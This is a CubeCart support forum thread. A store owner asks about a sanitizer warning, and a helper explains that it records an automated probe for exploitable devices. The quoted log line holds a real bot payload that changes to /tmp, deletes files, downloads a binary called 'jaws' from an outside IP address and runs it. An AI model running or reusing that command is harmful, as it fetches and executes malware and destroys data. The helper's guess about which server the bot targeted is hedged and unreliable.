Claudia M Posted April 27, 2022 Share Posted April 27, 2022 What does this error mean? [27-Apr-2022 09:14:57 America/Louisville] PHP Warning: Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_23_94_50_159/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxxx/public_html/classes/sanitize.class.php on line 114 This is a brand new site. The only thing I've done is some cosmetic stuff and intergrated Semper_Fi Related Products Module from my old site with the changes Brian gave me to make it work with CC6.4.4 and some custom changes I needed. I exported / imported the database needed from the old store to the new one. I'm running CC6.4.5 on the new site. Also I downloaded my raw access log, but have no way to open it. Thanks in advance for any and all help Link to comment Share on other sites More sharing options...
bsmither Posted April 27, 2022 Share Posted April 27, 2022 If/When you view the access logs, you may find a bot was trying a variety of known vectors into exploitable applications. In this case, the request seems to check for the existence of the Java AUGUR® Web Server - a specialty, extremely small web server that is (maybe, I don't know for sure) used for the web interfaces of routers and other "Internet of Things" (IoT) devices. The querystring (the part after index.php) contains a character that CubeCart deems suspicious (because CubeCart does nothing that would need this character). The Sanitizer killed it and logged a message. Link to comment Share on other sites More sharing options...
Claudia M Posted April 27, 2022 Author Share Posted April 27, 2022 So it's ok to ignore it? Cubecart handled it. Link to comment Share on other sites More sharing options...
bsmither Posted April 27, 2022 Share Posted April 27, 2022 Yes. And it was "handled". Although, to be fair, the exploitable device, if there is one, would get compromised before CubeCart even starts. Link to comment Share on other sites More sharing options...
Claudia M Posted April 28, 2022 Author Share Posted April 28, 2022 Brian this is getting annoying. Am I going to get these errors every day from here on out? I opened my error log but there's nothing matching date and time wise. But the logs only go back an hour or two. Link to comment Share on other sites More sharing options...
bsmither Posted April 28, 2022 Share Posted April 28, 2022 CubeCart's sanitizer logs the fact that it removed something, and also shows what was removed. But the entry into the log does not show where it was removed from: GET (the querystring seen in the access logs), POST (not visible in the access logs), or COOKIES (not visible). So, if the removed element was in POST or COOKIES, there will be no obvious matching log entry in the access logs for it. The only match will be date/time (add an offset of a few hours to get to UTC time). "Get these errors every day"? That's the wrong question. The question is, "Does having a successful online presence outweigh this 'annoyance'?" Link to comment Share on other sites More sharing options...
Claudia M Posted April 28, 2022 Author Share Posted April 28, 2022 I guess not. I'll just delete them Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.